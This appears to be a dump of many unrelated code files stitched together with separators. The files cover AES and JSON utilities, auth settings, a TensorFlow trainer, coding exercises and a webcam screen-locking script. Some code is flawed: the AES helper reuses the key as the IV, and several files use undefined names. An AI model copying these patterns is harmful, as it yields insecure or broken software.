array[x][y] = dark_decimal
array[w - x - 1][y] = bright_decimal
else:
array[x][y] = bright_decimal
array[w - x - 1][y] = dark_decimal
return image
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# 通用方法
import datetime
import json
import time
from binascii import b2a_hex, a2b_hex
from Crypto.Cipher import AES
#json加密兼容datetime
class DateEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, datetime.date):
return obj.strftime('%Y-%m-%d')
else:
return json.JSONEncoder.default(self, obj)
# json加密
def json_encode(data):
return json.dumps(data, cls=DateEncoder)
# json解密
def json_decode(json_data):
return json.loads(json_data)
# 获取n天前时间,n>0获取过去时间,n<0获取未来时间
def get_days_before(n=0, format="%Y-%m-%d %H:%M:%S"):
now = datetime.datetime.now()
days_before = now - datetime.timedelta(days=n)
ret_time = datetime.datetime(days_before.year, days_before.month, days_before.day, days_before.hour, days_before.minute, days_before.second)
return ret_time.strftime(format)
# 获取n小时前时间,n>0获取过去时间,n<0获取未来时间
def get_time_before_hour(hours, is_format=True, format='%Y-%m-%d %H:%M:%S'):
hours = int(hours)
t = time.time() - hours*60*60
if is_format:
t = time.strftime(format, time.localtime(t))
return t
def aes_encrypt(val, key, mode=AES.MODE_CBC):
cryptor = AES.new(key, mode, key)
length = 16
count = len(val)
if (count % length != 0):
add = length - (count % length)
else:
add = 0
val = val + ('\0' * add)
ret = cryptor.encrypt(val)
return b2a_hex(ret).decode('utf-8')
def aes_decrypt(val, key, mode=AES.MODE_CBC):
cryptor = AES.new(key, mode, key)
val = cryptor.decrypt(a2b_hex(val))
return val.decode('utf-8').rstrip('\0')
from tornado.httpclient import AsyncHTTPClient, HTTPRequest, HTTPResponse
from six.moves.urllib.parse import urlencode
# 异步get
async def async_get(url, params={}, responce_type='json', timeout=3):
http_client = AsyncHTTPClient()
if params:
params = urlencode(dict((k, v) for k, v in params.items()))
_url = '{0}?{1}'.format(url, params)
else :
_url = url
req = HTTPRequest(
url = _url,
method = "GET",
request_timeout = timeout
)
res = await http_client.fetch(req)
if res.error is not None:
return
if responce_type == 'json':
body = res.body.decode('utf-8')
res = json_decode(body)
return res
# 异步post
async def async_post(url, params, responce_type='json', timeout=3):
http_client = AsyncHTTPClient()
params = json_encode(params)
req = HTTPRequest(
url = url,
method = "POST",
body = params,
request_timeout = timeout
)
res = await http_client.fetch(req)
print (res.body.decode('utf-8'))
if res.error is not None:
return
if responce_type == 'json':
body = res.body.decode('utf-8')
res = json_decode(body)
return res |
import os
SOCIAL_AUTH_USER_MODEL='users.AuthUser'
SOCIAL_AUTH_LOGIN_URL= '/'
SOCIAL_AUTH_LOGIN_REDIRECT_URL='/'
SOCIAL_AUTH_LOGIN_ERROR_URL='/accounts/login-error/'
SOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/accounts/register/'
SOCIAL_AUTH_NEW_ASSOCIATION_REDIRECT_URL = '/accounts/register/'
SOCIAL_AUTH_FACEBOOK_KEY = os.environ.get('FACEBOOK_KEY')
SOCIAL_AUTH_FACEBOOK_SECRET = os.environ.get('FACEBOOK_SECRET')
SOCIAL_AUTH_FACEBOOK_SCOPE = ['email']
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id,name,email',
}
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ.get('GOOGLE_KEY')
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ.get('GOOGLE_SECRET')
SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['email'] |
import os
import numpy as np
#import matplotlib.pyplot as plt
import data_loader
import tensorflow as tf
import tensorflow.contrib.slim as slim
from sklearn.model_selection import train_test_split
image_size = 32
cropped_size = 28
num_channels = 1
pixel_depth = 255
num_labels = 5
num_digits = 10
depth = 32
patch_size_1 = 1
patch_size_3 = 3
patch_size_5 = 5
patch_size_7 = 7
train_data, train_labels, valid_data, valid_labels = data_loader.load_data()
print("Train data", train_data.shape)
print("Train labels", train_labels.shape)
print("Valid data", valid_data.shape)
print("Valid labels", valid_labels.shape)
def accuracy(labels, predictions):
return (100.0 * np.sum(np.argmax(predictions, 1) == labels) / predictions.shape[0])
def TrainConvNet():
def LecunLCN(X, image_shape, threshold=1e-4, radius=7, use_divisor=True):
"""Local Contrast Normalization"""
"""[http://yann.lecun.com/exdb/publis/pdf/jarrett-iccv-09.pdf]"""
# Get Gaussian filter
filter_shape = (radius, radius, image_shape[3], 1)
#self.filters = theano.shared(self.gaussian_filter(filter_shape), borrow=True)
filters = gaussian_filter(filter_shape)
X = tf.convert_to_tensor(X, dtype=tf.float32)
# Compute the Guassian weighted average by means of convolution
convout = tf.nn.conv2d(X, filters, [1,1,1,1], 'SAME')
# Subtractive step
mid = int(np.floor(filter_shape[1] / 2.))
# Make filter dimension broadcastable and subtract
centered_X = tf.subtract(X, convout)
# Boolean marks whether or not to perform divisive step
if use_divisor:
# Note that the local variances can be computed by using the centered_X
# tensor. If we convolve this with the mean filter, that should give us
# the variance at each point. We simply take the square root to get our
# denominator
# Compute variances
sum_sqr_XX = tf.nn.conv2d(tf.square(centered_X), filters, [1,1,1,1], 'SAME')
# Take square root to get local standard deviation
denom = tf.sqrt(sum_sqr_XX)
per_img_mean = tf.reduce_mean(denom)
divisor = tf.maximum(per_img_mean, denom)
# Divisise step
new_X = tf.truediv(centered_X, tf.maximum(divisor, threshold))
else:
new_X = centered_X
return new_X
def gaussian_filter(kernel_shape):
x = np.zeros(kernel_shape, dtype = float)
mid = np.floor(kernel_shape[0] / 2.)
for kernel_idx in range(0, kernel_shape[2]):
for i in range(0, kernel_shape[0]):
for j in range(0, kernel_shape[1]):
x[i, j, kernel_idx, 0] = gauss(i - mid, j - mid)
return tf.convert_to_tensor(x / np.sum(x), dtype=tf.float32)
def gauss(x, y, sigma=3.0):
Z = 2 * np.pi * sigma ** 2
return 1. / Z * np.exp(-(x ** 2 + y ** 2) / (2. * sigma ** 2))
def weight_layer(name, shape):
return tf.get_variable(name, shape, initializer=tf.contrib.layers.xavier_initializer())
def bias_variable(name, shape):
return tf.get_variable(name, shape, initializer=tf.contrib.layers.xavier_initializer())
def conv2d_relu(input, weights, bias):
return tf.nn.relu(tf.nn.conv2d(input, weights, [1,1,1,1], padding="SAME") + bias)
def max_pool_2x2(input):
return tf.nn.max_pool(input, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
graph = tf.Graph()
with graph.as_default():
input = tf.placeholder(tf.float32, shape=(None, image_size, image_size, num_channels), name="input")
labels = tf.placeholder(tf.int32, shape=(None), name="labels")
keep_prob = tf.placeholder(tf.float32, shape=(), name="keep_prob")
learning_rate = tf.placeholder(tf.float32, shape=(), name="learning_rate")
LCN = LecunLCN(input, (None, image_size, image_size, num_channels))
with slim.arg_scope([slim.conv2d, slim.max_pool2d], stride=1, padding='SAME'):
net = slim.conv2d(LCN, 64, [3,3])
net = slim.conv2d(net, 64, [3,3])
#Inception Module 1
branch_0 = slim.conv2d(net, 64, [1, 1])
branch_1 = slim.conv2d(net, 96, [1, 1])
branch_1 = slim.conv2d(branch_1, 128, [3, 3])
branch_2 = slim.conv2d(net, 16, [1, 1])
branch_2 = slim.conv2d(branch_2, 32, [3, 3])
branch_3 = slim.max_pool2d(net, [5, 5])
branch_3 = slim.conv2d(branch_3, 32, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#Inception Module 2
branch_0 = slim.conv2d(net, 128, [1, 1])
branch_1 = slim.conv2d(net, 128, [1, 1])
branch_1 = slim.conv2d(branch_1, 192, [3, 3])
branch_2 = slim.conv2d(net, 32, [1, 1])
branch_2 = slim.conv2d(branch_2, 96, [5, 5])
branch_3 = slim.max_pool2d(net, [3, 3])
branch_3 = slim.conv2d(branch_3, 64, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#MaxPool
net = slim.max_pool2d(net, [3,3], stride=2)
#Inception Module 3
branch_0 = slim.conv2d(net, 192, [1, 1])
branch_1 = slim.conv2d(net, 96, [1, 1])
branch_1 = slim.conv2d(branch_1, 208, [3, 3])
branch_2 = slim.conv2d(net, 16, [1, 1])
branch_2 = slim.conv2d(branch_2, 48, [5, 5])
branch_3 = slim.max_pool2d(net, [3, 3])
branch_3 = slim.conv2d(branch_3, 64, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#Inception Module 4
branch_0 = slim.conv2d(net, 160, [1, 1])
branch_1 = slim.conv2d(net, 112, [1, 1])
branch_1 = slim.conv2d(branch_1, 224, [3, 3])
branch_2 = slim.conv2d(net, 24, [1, 1])
branch_2 = slim.conv2d(branch_2, 64, [5, 5])
branch_3 = slim.max_pool2d(net, [3, 3])
branch_3 = slim.conv2d(branch_3, 64, [1, 1])
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
#MaxPool and 1x1 Conv to reduce dimensions
net = slim.max_pool2d(net, [3,3], stride=2)
net = slim.conv2d(net, 128, [1,1])
#Two Fully Connected
shape = net.get_shape().as_list()
reshape = tf.reshape(net, [-1, shape[1] * shape[2] * shape[3]])
fc = slim.fully_connected(reshape, 1024)
fc = slim.fully_connected(fc, 1024)
logits = slim.fully_connected(fc, 10)
cost = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits))
train_prediction = tf.nn.softmax(logits)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
with tf.Session(graph=graph) as session:
writer = tf.summary.FileWriter("/tmp/svhn_single")
writer.add_graph(session.graph)
num_steps = 60000
batch_size = 64
tf.global_variables_initializer().run()
print("Initialized")
lr = 0.0001
for step in range(num_steps):
offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
batch_data = train_data[offset:(offset + batch_size), :, :]
batch_labels = np.squeeze(train_labels[offset:(offset + batch_size), :])
feed_dict = {input : batch_data, labels : batch_labels, keep_prob : 0.5, learning_rate: lr}
if step % 10000 == 0:
lr = lr / 2
print("Learning Rate: ", lr)
if step % 500 == 0:
_, l, predictions, = session.run([optimizer, cost, train_prediction], feed_dict=feed_dict)
print('Minibatch loss at step %d: %f' % (step, l))
print('Minibatch accuracy: %.1f%%' % accuracy(batch_labels, predictions))
#Validation
v_steps = 10
v_batch_size = int(valid_data.shape[0] / v_steps)
v_preds = np.zeros((valid_labels.shape[0], num_digits))
for v_step in range(v_steps):
v_offset = (v_step * v_batch_size)
v_batch_data = valid_data[v_offset:(v_offset + v_batch_size), :, :]
v_batch_labels = np.squeeze(valid_labels[v_offset:(v_offset + v_batch_size),:])
feed_dict = {input : v_batch_data, labels : v_batch_labels, keep_prob : 1.0, learning_rate: lr}
l, predictions = session.run([cost, train_prediction], feed_dict=feed_dict)
v_preds[v_offset: v_offset + predictions.shape[0],:] = predictions
#If we missed any validation images at the end, process them now
if v_steps * v_batch_size < valid_data.shape[0]:
v_offset = (v_steps * v_batch_size)
v_batch_data = valid_data[v_offset:valid_data.shape[0] , :, :, :]
v_batch_labels = np.squeeze(valid_labels[v_offset:valid_data.shape[0],:])
feed_dict = {input : v_batch_data, labels : v_batch_labels, keep_prob : 1.0, learning_rate: lr}
l, predictions, = session.run([total_cost, train_prediction], feed_dict=feed_dict)
v_preds[v_offset: v_offset + predictions.shape[0],:] = predictions
print('Valid accuracy: %.1f%%' % accuracy(np.squeeze(valid_labels), v_preds))
else:
_, l, predictions, = session.run([optimizer, cost, train_prediction], feed_dict=feed_dict)
TrainConvNet()
|
from System import DateTime
def UpdateTOF():
"""
<Script>
<Author>ANK</Author>
<Description>This script modifies scenario dates </Description>
</Script>
"""
scenarioFullPath = "/Group of cali/cali/Scenario of cali"
TOF = DateTime(2014,2,1)
SOS = TOF.AddDays(-1)
EOS = TOF.AddDays(1)
scmgr = app.Modules.Get("Scenario Manager")
scenario = scmgr.ScenarioList.Fetch(scenarioFullPath);
# first make sure we can set the dates without conflict (must hav SOS<=TOF<=EOS)
scenario.SimulationStartDate = DateTime.MinValue
scenario.SimulationTimeOfForecast = DateTime.MinValue
scenario.SimulationEndDate = DateTime.MinValue
# then set the dates
scenario.SimulationEndDate = EOS
scenario.SimulationTimeOfForecast = TOF
scenario.SimulationStartDate = SOS
# write changes to the database
scmgr.ScenarioList.Update (scenario);
|
import utils
import sorts
bookshelf = utils.load_books('books_small.csv')
for book in bookshelf:
print(book)
def by_title_ascending(book_a, book_b):
return book_a['title_lower'] > book_b['title_lower']
#if (book_a['title_lower'] > book_b['title_lower']):
# return True
#return False
sort_1 = sorts.bubble_sort(bookshelf, by_title_ascending)
for book in sort_1:
print(book['title'])
def by_author_ascending(book_a, book_b):
return book_a['author_lower'] > book_b['author_lower']
def by_total_length(book_a, book_b):
a = len(book_a['title_lower']) + len(book_a['author_lower'])
b = len(book_b['title_lower']) + len(book_b['author_lower'])
return a > b
bookshelf_v1 = bookshelf[:]
sort_2 = sorts.bubble_sort(bookshelf, by_author_ascending)
for book in sort_2:
print(book['author'])
bookshelf_v2 = bookshelf[:]
sorts.quicksort(bookshelf_v2, 0, (len(bookshelf_v2)-1), by_author_ascending)
for book in bookshelf_v2:
print(book['author'])
long_bookshelf = utils.load_books('books_large.csv')
#This one runs slowely because the list is mostly unsorted
sort_3 = sorts.bubble_sort(long_bookshelf, by_total_length)
print(sort_3)
sorts.quicksort(long_bookshelf, 0, len(long_bookshelf)-1, by_total_length)
print(long_bookshelf)
|
fh=open("File_name.fasta")
count=0
num=0
for line in fh:
if line.startswith(">"):continue
line=line.rstrip()
print(">"+str(num)+"|0|training") #|1| for negetive files
print(line)
count+=1
num+=1
print(count) |
############################################
# Copyright (c) 2012 Microsoft Corporation
#
# Z3 Python interface for Z3 polynomials
#
# Author: Leonardo de Moura (leonardo)
############################################
from .z3 import *
def subresultants(p, q, x):
"""
Return the non-constant subresultants of 'p' and 'q' with respect to the "variable" 'x'.
'p', 'q' and 'x' are Z3 expressions where 'p' and 'q' are arithmetic terms.
Note that, any subterm that cannot be viewed as a polynomial is assumed to be a variable.
Example: f(a) is a considered to be a variable b in the polynomial
f(a)*f(a) + 2*f(a) + 1
>>> x, y = Reals('x y')
>>> subresultants(2*x + y, 3*x - 2*y + 2, x)
[-7*y + 4]
>>> r = subresultants(3*y*x**2 + y**3 + 1, 2*x**3 + y + 3, x)
>>> r[0]
4*y**9 + 12*y**6 + 27*y**5 + 162*y**4 + 255*y**3 + 4
>>> r[1]
-6*y**4 + -6*y
"""
return AstVector(Z3_polynomial_subresultants(p.ctx_ref(), p.as_ast(), q.as_ast(), x.as_ast()), p.ctx)
if __name__ == "__main__":
import doctest
if doctest.testmod().failed:
exit(1)
|
# O(n^2) O(n)
class Solution:
def findCircleNum(self, M: List[List[int]]) -> int:
ctr = 0
visited = set()
for i in range(len(M)):
if i not in visited:
ctr += 1
self.visit(i, visited, M)
return ctr
def visit(self, i, visited, M):
visited.add(i)
for j in range(len(M[i])):
if M[i][j] and j not in visited:
self.visit(j, visited, M) |
#!/bin/env python
#*******************************************************************************
#
# Filename : runHistCompare.py
# Description : Generating scripts for running hist compare
# Author : Yi-Mu "Enoch" Chen [ ensc@hep1.phys.ntu.edu.tw ]
#
#*******************************************************************************
import optparse
import os
import re
import subprocess
import glob
import TstarAnalysis.RunSequence.Naming as myname
import TstarAnalysis.RunSequence.Settings as mysetting
import TstarAnalysis.RunSequence.PathVars as mypath
script_template = """
#!/bin/bash
source /cvmfs/cms.cern.ch/cmsset_default.sh
cd {0}
eval `scramv1 runtime -sh`
cmsRun {0}/RunSequence/cmsrun/run_reco_compare.py Mode={1} sample={2} output={3} maxEvents=-1
cp {3} {4}
rm {3}
"""
def main():
parser = optparse.OptionParser()
parser.add_option('-i', '--inputlist', dest='input',
help='list of data sets to generate', default=None, type='string')
parser.add_option('-m', '--mode', dest='mode',
help='which mode to run with', default=None, type='string')
(opt, args) = parser.parse_args()
if not opt.input or not opt.mode:
print "Error! [input] and [mode] inputs are obligatory!"
parser.print_help()
return
with open(opt.input) as f:
dataset_list = f.readlines()
for dataset in dataset_list:
dataset = dataset.strip()
if "Tstar" not in dataset : ## Must be a tstar signal MC
print "Skipping dataset ", dataset
continue
filequery = ""
if "Muon" in opt.mode:
filequery = myname.GetEDMStoreGlob( 'tstarbaseline', dataset, "Muon")
elif "Electron" in opt.mode:
filequery = myname.GetEDMStoreGlob( 'tstarbaseline', dataset, "Electron")
else:
print "ERROR! Unrecongnized mode ", opt.mode
sys.exit(1)
# p = subprocess.Popen(
# ['/afs/cern.ch/project/eos/installation/0.3.84-aquamarine/bin/eos.select','ls',filequery],
# stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# out, err = p.communicate()
# file_master_list = [ os.path.dirname(filequery)+'/'+x for x in out.split()]
file_master_list = glob.glob( filequery )
file_chunks = [file_master_list[i:i + 3]
for i in range(0, len(file_master_list), 3)]
for index, file_list in enumerate(file_chunks):
file_list = [ 'file://'+x for x in file_list ]
sample_input = ','.join(file_list)
tempoutput = myname.GetTempOutput( 'recocomp',dataset, opt.mode,index )
storeoutput = myname.GetEDMStoreFile( 'recocomp', dataset, opt.mode, index )
script_file_name = myname.GetScriptFile( 'recocomp', dataset, opt.mode, index )
script_content = script_template.format(
mysetting.tstar_dir,
opt.mode,
sample_input,
tempoutput,
storeoutput,
)
script_file = open(script_file_name, 'w')
script_file.write(script_content)
script_file.close()
os.system("chmod +x " + script_file_name)
print "Writting into file ", script_file_name
if __name__ == "__main__":
main()
|
import dash.dependencies
import dash_html_components as html
import dash_core_components as dcc
import os
import pandas as pd
import plotly.graph_objs as go
app = dash.Dash()
app.layout = html.Div(children=[
html.Div(html.Label('Hello, what do you like to do in your free time?'),
style = {
'display': 'inline-block', 'vertical-align': 'middle',
'textAlign': 'center', 'font-size': '1.6em', 'width': '40%'
}),
html.Div(
dcc.Dropdown(
id = 'example-dropdown',
options = [
{'label': 'Read books', 'value': 'read'},
{'label': 'Bake cakes', 'value': 'bake'},
],
value = ''
), style = {
'display': 'inline-block', 'vertical-align': 'middle',
'textAlign': 'center', 'font-size': '1.6em', 'width': '40%'
}),
dcc.Graph(
id='example-plot',
figure={
'data': [
go.Bar(x=[1], y=[628], name='Paperback'),
go.Bar(x=[1], y=[796], name='Hardcover')
],
'layout': {
'title': 'Book weight in grams'
}
}
)
])
@app.callback(
dash.dependencies.Output(component_id='example-plot', component_property='figure'),
[dash.dependencies.Input(component_id='example-dropdown', component_property='value')]
)
def update_plot(choice):
data=[]
return data
if __name__ == '__main__':
app.run_server()
|
# 문제4.
# 구구단 중에 특정 곱셈을 만들고 그 답을 선택하는 프로그램을 작성하는 문제입니다.
# 답을 포함하여 9개의 정수가 아래와 같은 형태로 출력되고 사용자는 답을 골라 입력하게 됩니다.
# 프로그램은 정답 여부를 다시 출력합니다.
import random
min, max = 1, 81
while True:
dan = random.randrange(9)+1
gob = random.randrange(9)+1
n = dan * gob
numlist = [random.randrange(max)+min for i in range(1, 9)]
numlist.append(n)
random.shuffle(numlist)
print()
print('{} x {} = ?'.format(dan, gob))
for i, num in enumerate(numlist):
print(num, end='\t')
if i % 3 == 2:
print()
print()
while True:
answer = input('answer :')
if n == int(answer):
print('정답')
print()
break
else:
print('오답')
print()
if "n" == input('다음 문제를 푸시겠습니까? (y/n)'):
break
|
import json
import sys
from pathlib import Path
from loguru import logger
from typing import cast, Optional
logger.remove()
logger.add(sys.stderr, level="INFO", enqueue=True)
class Config:
"""Config system for Dataherb"""
def __init__(
self,
is_aggregated: bool = False,
config_path: Optional[Path] = None,
no_config_error: bool = False,
):
self.is_aggregated = is_aggregated
self.config_path = config_path
self.no_config_error = no_config_error
if self.config_path is None:
home = Path.home()
self.config_path = home / ".dataherb/config.json"
if not self.config_path.exists():
if self.no_config_error:
logger.error(
f"Config file {self.config_path} does not exist.\n"
f"If this is the first time you use dataherb, please run `dataherb configure` to config dataherb."
)
# self.config = self.get_config(no_config_error=self.no_config_error)
def _flora_path(self, flora, workdir: Optional[str] = None) -> Path:
"""Get the full path to the specified flora"""
if workdir is None:
workdir = self.config["WD"]
if self.is_aggregated:
which_flora_path = Path(workdir) / "flora" / Path(flora + ".json")
else:
which_flora_path = Path(workdir) / "flora" / Path(flora)
logger.debug(f"Using flora path: {which_flora_path}")
if not which_flora_path.exists():
raise Exception(f"flora config {which_flora_path} does not exist")
return which_flora_path
@property
def config(self):
"""Loads the dataherb config file.
Load the content from the specified file as the config. The config file has to be json.
"""
return self._config()
def _config(self) -> dict:
"""Loads the dataherb config file."""
config_path = cast(Path, self.config_path)
logger.debug(f"Using {config_path} as config file for dataherb")
try:
with config_path.open(mode="r") as f:
conf = json.load(f)
if not conf.get("workdir"):
logger.error(
f"Please specify working directory in the config file using the key workdir"
)
elif conf.get("workdir", "").startswith("~"):
home = Path.home()
conf["workdir"] = str(home / conf["workdir"][2:])
except json.decoder.JSONDecodeError:
logger.error(
f"Config file {config_path} is not valid json.\n"
f"Please rerun `dataherb configure` to reconfi dataherb or manually fix it."
)
conf = {}
return conf
@property
def workdir(self):
return self.config["workdir"]
@property
def flora_path(self):
return self._flora_path(
self.config.get("default", {}).get("flora"), self.config["workdir"]
)
@property
def flora(self):
return self.config.get("default", {}).get("flora")
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/rlessard/packages/omtk/0.4.999/python/omtk/ui/pluginmanager_window.ui'
#
# Created: Tue Feb 20 10:34:53 2018
# by: pyside2-uic running on Qt 2.0.0~alpha0
#
# WARNING! All changes made in this file will be lost!
from Qt import QtCore, QtGui, QtWidgets, QtCompat
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
mainWindow.setObjectName("mainWindow")
mainWindow.resize(485, 391)
self.centralwidget = QtWidgets.QWidget(mainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.lineEdit_search = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_search.setObjectName("lineEdit_search")
self.verticalLayout.addWidget(self.lineEdit_search)
self.tableView = QtWidgets.QTableView(self.centralwidget)
self.tableView.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tableView.setObjectName("tableView")
self.tableView.horizontalHeader().setStretchLastSection(True)
self.verticalLayout.addWidget(self.tableView)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.pushButton_reload = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_reload.setObjectName("pushButton_reload")
self.horizontalLayout.addWidget(self.pushButton_reload)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout.addLayout(self.horizontalLayout)
mainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(mainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 485, 28))
self.menubar.setObjectName("menubar")
mainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(mainWindow)
self.statusbar.setObjectName("statusbar")
mainWindow.setStatusBar(self.statusbar)
self.actionReload = QtWidgets.QAction(mainWindow)
self.actionReload.setObjectName("actionReload")
self.actionSearchQueryChanged = QtWidgets.QAction(mainWindow)
self.actionSearchQueryChanged.setObjectName("actionSearchQueryChanged")
self.retranslateUi(mainWindow)
QtCore.QObject.connect(self.pushButton_reload, QtCore.SIGNAL("released()"), self.actionReload.trigger)
QtCore.QObject.connect(self.lineEdit_search, QtCore.SIGNAL("textChanged(QString)"), self.actionSearchQueryChanged.trigger)
QtCore.QMetaObject.connectSlotsByName(mainWindow)
def retranslateUi(self, mainWindow):
mainWindow.setWindowTitle(QtCompat.translate("mainWindow", "OMTK - Plugin Manager", None, -1))
self.pushButton_reload.setText(QtCompat.translate("mainWindow", "Reload", None, -1))
self.actionReload.setText(QtCompat.translate("mainWindow", "Reload", None, -1))
self.actionSearchQueryChanged.setText(QtCompat.translate("mainWindow", "SearchQueryChanged", None, -1))
|
import numpy as np
def latlong2dist(lat1, long1, lat2, long2):
"""
https://en.wikipedia.org/wiki/Haversine_formula#:~:text=The%20haversine%20formula%20determines%20the,given%20their%20longitudes%20and%20latitudes.&text=The%20term%20haversine%20was%20coined,sin2(%CE%B82).
:param lat1:
:param long1:
:param lat2:
:param long2:
:return:
"""
R = 6357000.0
dLat = (lat2 - lat1)*np.pi/180
dLong = (long2 - long1)*np.pi/180
a = np.sin(dLat/2) * np.sin(dLat/2) \
+ np.cos(lat1*np.pi/180) * np.cos(lat2*np.pi/180) * \
np.sin(dLong/2) * np.sin(dLong/2)
c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))
d = R * c # Distance in m
return d
def latlong2bearing(lat1, long1, lat2, long2):
"""
# https://www.igismap.com/formula-to-find-bearing-or-heading-angle-between-two-points-latitude-longitude/
# θ = atan2(sin(Δlong)*cos(lat2), cos(lat1)*sin(lat2) − sin(lat1)*cos(lat2)*cos(Δlong))
Definition of direction is the traditional North 0 deg, east 90 deg, etc.
"""
dLong = (long2 - long1)*np.pi/180
return np.arctan2(np.sin(dLong)*np.cos(lat2*np.pi/180),
np.cos(lat1*np.pi/180)*np.sin(lat2*np.pi/180) - np.sin(lat1*np.pi/180)*np.cos(lat2*np.pi/180)*np.cos(dLong))
|
# A. Love "A"
s = input()
num_of_a = s.count('a')
s_half = len(s) / 2
ans = len(s) if num_of_a > s_half else num_of_a * 2 - 1
print(ans)
|
"""
ChikonEye literally watches your back.
preventing others who peeps your computer from seeing your valuable secret works.
Now your works are safe and secure.
Chikon eye uses your laptop(primary = 0 or secondary = 1, 2 so on) camera to see how
many people are watching at the computer screen. If some1 unauthorized tries to see
it automatically locks the computer screen.
developed by Ashraf Minhaj
mail me at- ashraf_minhaj@yahoo.com
"""
"""
Version: Completely in testing period.
I'll make and executable .exe file so that this can be run on any computer.
right now it can be used by the people who has python, numpy, opencv pyautogui
installed in their pc. Don't worry exe is coming soon.
"""
"""
This is the recognizer code, after creating dataset and training the model
you can use this. Other associated files and codes will be uploaded soon
"""
import numpy as np #numpy library as np
import cv2 #openCv library
import pyautogui #pyautogui
from time import sleep #time library
pyautogui.FAILSAFE = False #pyautogui failsafe to false (see doc)
#location of opencv haarcascade <change according to your file location>
face_cascade = cv2.CascadeClassifier('F:\\opencv\\sources\\data\\haarcascades\\haarcascade_frontalface_alt2.xml')
cap = cv2.VideoCapture(0) # 0 = main camera , 1 = extra connected webcam and so on.
rec = cv2.face.LBPHFaceRecognizer_create()
rec.read("C:\\Users\\HP\\cv_practice\\attempt2\\trainData.yml") #yml file location <change as yours>
id = 0 #set id variable to zero
font = cv2.FONT_HERSHEY_COMPLEX
col = (255, 0, 0)
strk = 2
while True: #This is a forever loop
ret, frame = cap.read() #Capture frame by frame
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) #change color from BGR to Gray
faces = face_cascade.detectMultiScale(gray, scaleFactor = 1.5, minNeighbors = 5)
#print(faces)
for(x, y, w, h) in faces:
#print(x, y, w, h)
roi_gray = gray[y: y+h, x: x+w] #region of interest is face
#*** Drawing Rectangle ***
color = (255, 0, 0)
stroke = 2
end_cord_x = x+w
end_cord_y = y+h
cv2.rectangle(frame, (x,y), (end_cord_x, end_cord_y), color, stroke)
#***detect
id, conf = rec.predict(roi_gray)
#cv2.putText(np.array(roi_gray), str(id), font, 1, col, strk)
print(id) #prints the id's
#if sees unauthorized person
if id != 1 and id != 5 and id == 2 or id == 3 or id == 4 or id == 6 or id == 7:
#execute lock command
pyautogui.hotkey('win', 'r') #win + run key combo
pyautogui.typewrite("cmd\n") # type cmd and 'Enter'= '\n'
sleep(0.500) #a bit delay <needed!>
#windows lock code to command prompt and hit 'Enter'
pyautogui.typewrite("rundll32.exe user32.dll, LockWorkStation\n")
elif id == 1 or id == 5: #if authorized person (me & my Brother Siam)
print("Authorized Person\n") #do nothing
cv2.imshow('ChikonEye', frame)
#check if user wants to quit the program (pressing 'q')
if cv2.waitKey(10) == ord('q'):
x = pyautogui.confirm("Close the Program 'ChikonEye'?")
if x == 'OK':
break
cap.release()
cv2.destroyAllWindows() #remove all windows we have created
|
import requests
import os
from os.path import join, dirname
from dotenv import load_dotenv
import json
#環境変数読み込み
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
API_KEY = os.environ.get("API_KEY")
URL = os.environ.get("URL")
def main():
original_data = get_Api_Parameter(API_KEY)
print(result.text)
def get_Api_Parameter(API_KEY: str,) -> str:
parameter = URL + API_KEY + "&keyword=東京都"
print(parameter)
response = requests.get(parameter)
return response
def pop_Store_data(original_data: str,) -> str:
for store_name in original_data:
pass
if __name__ == '__main__':
main() |
import re
a = ord('a')
z = a+25
S = input()
D = {}
for i in range(a,z+1):
try:
r = re.search(chr(i), S).start()
except AttributeError:
D[chr(i)] = -1
else:
D[chr(i)] = r
ans = ''
for j in D.keys():
ans += str(D[j]) + ' '
print(ans.strip())
# Done |
import os
import sys
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import seaborn
import csv
from yattag import Doc
from yattag import indent
class Plotter(object):
def __init__(self):
self._scalar_data_frame_dict = {}
self._dist_data_frame_dict = {}
def scalar(self, name, step, value, epoch=None):
if isinstance(value, dict):
data = value.copy()
data.update({
'step' : step
})
else:
data = {
'step' : step,
name : value,
}
if epoch is not None:
data['epoch'] = epoch
df = pd.DataFrame(data, index=[0])
if name not in self._scalar_data_frame_dict:
self._scalar_data_frame_dict[name] = df
else:
